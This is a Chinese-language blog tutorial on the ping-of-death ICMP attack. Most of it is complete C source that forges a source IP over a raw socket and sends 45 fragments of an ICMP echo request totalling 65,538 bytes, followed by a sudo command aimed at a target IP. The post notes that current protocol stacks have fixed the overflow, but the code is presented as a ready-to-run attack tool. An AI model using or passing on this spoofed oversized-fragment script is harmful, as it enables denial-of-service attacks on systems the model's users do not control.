icmp攻击类型ping-of-death

2023-12-19 09:32
文章标签 类型 icmp 攻击 ping death

本文主要是介绍icmp攻击类型ping-of-death,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

某些协议栈对于分片报文,事先分配最大IP长度65536字节的缓冲区,而实际接收到的分片在重组时,超过65536的长度将导致缓冲区溢出错误。当前的各个协议栈实现早已修复此问题。

以下程序用于发送超过65536的IP分片报文,首先是头文件部分:

#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>

其次是初始化初始RAW套接口,以及参数:

int main(int argc, char **argv)
{int s;char buf[1500];const int buflen = 1500;struct ip *ip = (struct ip *)buf;struct icmp *icmp = (struct icmp *)(ip + 1);struct sockaddr_in dst;int offset;int on = 1;if (argc != 3) {fprintf(stderr, "usage: %s source hostname\n", argv[0]);exit(1);}bzero(buf, buflen);if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {perror("socket");exit(1);}if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {perror("IP_HDRINCL");exit(1);}if ((ip->ip_src.s_addr = inet_addr(argv[1])) == -1) {fprintf(stderr, "%s: unknown src address\n", argv[1]);exit(1);}if ((ip->ip_dst.s_addr = inet_addr(argv[2])) == -1) {fprintf(stderr, "%s: unknown dst address\n", argv[2]);exit(1);}printf("Sending to %s", inet_ntoa(ip->ip_dst));printf(" from %s\n", inet_ntoa(ip->ip_src));

初始化IP头部字段,和ICMP信息,类型为(ICMP_ECHO)8,code为0,即ECHO Request(ping)报文:

        ip->ip_v = 4;ip->ip_hl = sizeof *ip >> 2;ip->ip_tos = 0;ip->ip_len = htons(buflen);ip->ip_id = htons(5271);ip->ip_off = htons(0);ip->ip_ttl = 255;ip->ip_p = IPPROTO_ICMP;ip->ip_sum = 0; /* set by protocol stack */dst.sin_addr = ip->ip_dst;dst.sin_family = AF_INET;icmp->icmp_type = ICMP_ECHO;icmp->icmp_code = 0;icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));

最后,发送44个1480字节的分片,共65120字节,第45个分片长度为418字节,总共是65538字节,超过65536的最大长度:

        for (offset = 0; offset < 65536; offset += (buflen - sizeof *ip)/*1480*/) {int slen = buflen;ip->ip_off = htons(offset >> 3); /* divide by 8. */if (offset < 65120/* 1480*44 */) {ip->ip_off |= htons(IP_MF);} else {ip->ip_len = htons(418); /* make total 65538 */slen = 418;}if (sendto(s, buf, slen, 0, (struct sockaddr *)&dst,sizeof dst) < 0) {fprintf(stderr, "offset %d: errno %d", offset, errno);}if (offset == 0)memset(icmp, 0, sizeof(struct icmp));}return 0;
}

编译完成之后,如下调用,需要输入源IP地址,和要攻击的目标IP地址:

$ ./a.out 
usage: ./a.out source hostname
$ 
$ sudo ./a.out 192.168.1.124 192.168.1.109

windows系统在将回复参数错误的ICMP报文,如下图:

在这里插入图片描述

这篇关于icmp攻击类型ping-of-death的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/511695

相关文章

Spring Boot 配置文件之类型、加载顺序与最佳实践记录

《SpringBoot配置文件之类型、加载顺序与最佳实践记录》SpringBoot的配置文件是灵活且强大的工具,通过合理的配置管理,可以让应用开发和部署更加高效,无论是简单的属性配置,还是复杂... 目录Spring Boot 配置文件详解一、Spring Boot 配置文件类型1.1 applicatio

Python如何查看数据的类型

《Python如何查看数据的类型》:本文主要介绍Python如何查看数据的类型方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录python查看数据的类型1. 使用 type()2. 使用 isinstance()3. 检查对象的 __class__ 属性4.

Python容器类型之列表/字典/元组/集合方式

《Python容器类型之列表/字典/元组/集合方式》:本文主要介绍Python容器类型之列表/字典/元组/集合方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录1. 列表(List) - 有序可变序列1.1 基本特性1.2 核心操作1.3 应用场景2. 字典(D

Python如何在Word中生成多种不同类型的图表

《Python如何在Word中生成多种不同类型的图表》Word文档中插入图表不仅能直观呈现数据,还能提升文档的可读性和专业性,本文将介绍如何使用Python在Word文档中创建和自定义各种图表,需要的... 目录在Word中创建柱形图在Word中创建条形图在Word中创建折线图在Word中创建饼图在Word

SpringBoot接收JSON类型的参数方式

《SpringBoot接收JSON类型的参数方式》:本文主要介绍SpringBoot接收JSON类型的参数方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、jsON二、代码准备三、Apifox操作总结一、JSON在学习前端技术时,我们有讲到过JSON,而在

web网络安全之跨站脚本攻击(XSS)详解

《web网络安全之跨站脚本攻击(XSS)详解》:本文主要介绍web网络安全之跨站脚本攻击(XSS)的相关资料,跨站脚本攻击XSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本诱使用户执行,可能... 目录前言XSS 的类型1. 存储型 XSS(Stored XSS)示例:危害:2. 反射型 XSS(Re

Rust中的BoxT之堆上的数据与递归类型详解

《Rust中的BoxT之堆上的数据与递归类型详解》本文介绍了Rust中的BoxT类型,包括其在堆与栈之间的内存分配,性能优势,以及如何利用BoxT来实现递归类型和处理大小未知类型,通过BoxT,Rus... 目录1. Box<T> 的基础知识1.1 堆与栈的分工1.2 性能优势2.1 递归类型的问题2.2

Python如何计算两个不同类型列表的相似度

《Python如何计算两个不同类型列表的相似度》在编程中,经常需要比较两个列表的相似度,尤其是当这两个列表包含不同类型的元素时,下面小编就来讲讲如何使用Python计算两个不同类型列表的相似度吧... 目录摘要引言数字类型相似度欧几里得距离曼哈顿距离字符串类型相似度Levenshtein距离Jaccard相

Go语言中三种容器类型的数据结构详解

《Go语言中三种容器类型的数据结构详解》在Go语言中,有三种主要的容器类型用于存储和操作集合数据:本文主要介绍三者的使用与区别,感兴趣的小伙伴可以跟随小编一起学习一下... 目录基本概念1. 数组(Array)2. 切片(Slice)3. 映射(Map)对比总结注意事项基本概念在 Go 语言中,有三种主要

Redis的Zset类型及相关命令详细讲解

《Redis的Zset类型及相关命令详细讲解》:本文主要介绍Redis的Zset类型及相关命令的相关资料,有序集合Zset是一种Redis数据结构,它类似于集合Set,但每个元素都有一个关联的分数... 目录Zset简介ZADDZCARDZCOUNTZRANGEZREVRANGEZRANGEBYSCOREZ